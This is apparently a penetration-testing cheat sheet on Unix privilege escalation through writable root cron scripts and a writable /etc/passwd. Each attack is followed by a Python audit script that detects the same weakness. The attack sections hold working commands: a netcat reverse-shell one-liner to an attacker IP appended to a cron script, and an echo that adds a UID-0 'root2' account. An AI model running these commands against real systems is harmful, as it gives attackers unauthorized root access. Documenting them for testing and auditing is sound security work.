Privilege escalation techniques on Unix: exploiting insecure file permissions on files that are executed or read by services running as root or as service accounts with more privileges than the current user.
Scheduled Jobs
Locate an executable file that is writable by the current user and that runs at an elevated privilege level (for example, a script launched by a root cron job).
grep "CRON" /var/log/cron.log
Take a reverse shell one-liner from the PentestMonkey reverse shell cheat sheet and append it to the script so that it runs with the job's elevated privileges. Append an empty line first so the one-liner starts on its own line, then check the file contents.
echo >> <filename>
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $KALI_IP 443 >/tmp/f" >> <filename>
cat <filename>
Start a listener on port 443 and wait for the scheduled job to run.
sudo nc -lnvp 443
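The defensive counterpart of the steps above is an audit that finds the same condition before an attacker does: a job that runs as root whose executable can be modified by an unprivileged user. The script below is an added example, not part of the original cheat sheet; it parses a constructed /etc/crontab-style sample, resolves each job's executable under a throwaway directory tree it builds itself, and flags jobs whose file (or containing directory) is writable by group or others. The crontab content, paths and file modes are all constructed for the demonstration.

```python
import os
import shutil
import stat
import tempfile

# Constructed sample of an /etc/crontab-style file; paths and job names are
# made up for the demonstration and are not from any real host.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
*/5 * * * * root /opt/backup/run-backup.sh
0 3 * * *   root /usr/local/bin/rotate-logs --keep 7
15 * * * *  www-data /var/www/cleanup.sh --quiet
@reboot     root /etc/init.d/custom-start
"""


def parse_system_crontab(text):
    """Return (user, executable) pairs from system-crontab lines.

    System crontab lines carry five time fields (or an @keyword) followed
    by the user and the command; the executable is the command's first word.
    Blank lines, comments and VAR=value assignments are skipped.
    """
    jobs = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        user_idx = 1 if fields[0].startswith("@") else 5
        if len(fields) < user_idx + 2:
            continue  # no user or command on the line
        jobs.append((fields[user_idx], fields[user_idx + 1]))
    return jobs


def modifiable_by_unprivileged(path):
    """True if group or others can write the file, or if the directory that
    holds it is world-writable without the sticky bit (the file could then
    be replaced). Symlinks are resolved by os.stat; a missing file is not a
    permission finding here and returns False.
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    parent = os.stat(os.path.dirname(path) or ".")
    return bool(parent.st_mode & stat.S_IWOTH) and not parent.st_mode & stat.S_ISVTX


def find_risky_jobs(crontab_text, root="/", privileged=("root",)):
    """Return (user, executable) pairs for jobs that run as a privileged
    account and whose executable an unprivileged user could modify.
    `root` lets the crontab's absolute paths be resolved under a test tree.
    """
    risky = []
    for user, exe in parse_system_crontab(crontab_text):
        if user not in privileged:
            continue
        real_path = exe if root == "/" else os.path.join(root, exe.lstrip("/"))
        if modifiable_by_unprivileged(real_path):
            risky.append((user, exe))
    return risky


def demo(privileged=("root",)):
    """Build a constructed file tree under a temp dir with one deliberately
    world-writable job script, audit SAMPLE_CRONTAB against it, and return
    the flagged jobs. The temp tree is removed afterwards.
    """
    base = tempfile.mkdtemp()
    layout = {
        "opt/backup/run-backup.sh": 0o777,   # world-writable, runs as root
        "usr/local/bin/rotate-logs": 0o755,  # fine
        "var/www/cleanup.sh": 0o775,         # group-writable, runs as www-data
        "etc/init.d/custom-start": 0o755,    # fine
    }
    try:
        for rel, mode in layout.items():
            full = os.path.join(base, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            os.chmod(os.path.dirname(full), 0o755)  # keep parents sane whatever the umask
            with open(full, "w") as fh:
                fh.write("#!/bin/sh\nexit 0\n")
            os.chmod(full, mode)
        return find_risky_jobs(SAMPLE_CRONTAB, root=base, privileged=privileged)
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for user, exe in demo():
        print(f"{exe} runs as {user} but is writable by unprivileged users")
```

Run against a live host with root="/" and the contents of /etc/crontab and /etc/cron.d/*; extend `privileged` with any service account that matters on that host. The parent-directory check is what catches the case where the script itself is 0755 but sits in a directory anyone can write to.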
/etc/passwd
Password hashes are normally stored in /etc/shadow, but for backward compatibility a hash can be placed directly in the second field of /etc/passwd. When that field holds a hash instead of "x", the system uses it and ignores the /etc/shadow entry for that account.
Check the permissions on /etc/passwd; the technique requires write access for the current user.
ls -la /etc/passwd
Generate a password hash for the new /etc/passwd entry.
openssl passwd <some password>
Add a new superuser.
Superuser accounts in Linux have both a user ID (UID) and a group ID (GID) of 0, so any entry with UID 0 is equivalent to root.
echo "root2:<password hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
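To detect exactly this kind of tampering, an audit should check /etc/passwd for hashes in the password field, empty password fields and extra UID-0 accounts, and confirm the file is not writable by anyone but root. The script below is an added example, not part of the original cheat sheet; it runs over a constructed passwd sample (the hash string is a placeholder, not a real crypt value) and checks the mode of a temporary copy at 0666 and then at 0644.

```python
import os
import stat
import tempfile

# Constructed sample of an /etc/passwd file with one planted superuser entry;
# the hash string is a placeholder, not a real crypt hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
root2:$6$constructed$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""

# Second-field values that mean "look in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!", "!*", "*LK*"}


def audit_passwd(text):
    """Return (account, reason) findings for entries that let someone bypass
    /etc/shadow or gain root: a hash in the password field, an empty
    password field, or a UID-0 account that is not root. Malformed lines
    are reported by their raw text.
    """
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry, expected 7 colon-separated fields"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            findings.append((name, "empty password field, login needs no password"))
        elif password not in SHADOWED_OR_LOCKED:
            findings.append((name, "hash stored in /etc/passwd, /etc/shadow is bypassed"))
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account that is not root"))
    return findings


def writable_by_group_or_others(path):
    """True if the file's mode grants write to group or others; /etc/passwd
    should be root-owned 0644 so that only root can append entries."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo_mode_check():
    """Write a temp copy of SAMPLE_PASSWD, check it at mode 0666 and then at
    0644, and return both results as (weak_writable, fixed_writable)."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(SAMPLE_PASSWD)
        os.chmod(path, 0o666)
        weak = writable_by_group_or_others(path)
        os.chmod(path, 0o644)
        fixed = writable_by_group_or_others(path)
        return weak, fixed
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
    print("writable at 0666, then at 0644:", demo_mode_check())
```

On a real host, feed audit_passwd the contents of /etc/passwd and run writable_by_group_or_others on the file itself; any hit on either is worth an incident ticket, since a legitimate system has no reason to carry hashes in /etc/passwd or a second UID-0 login.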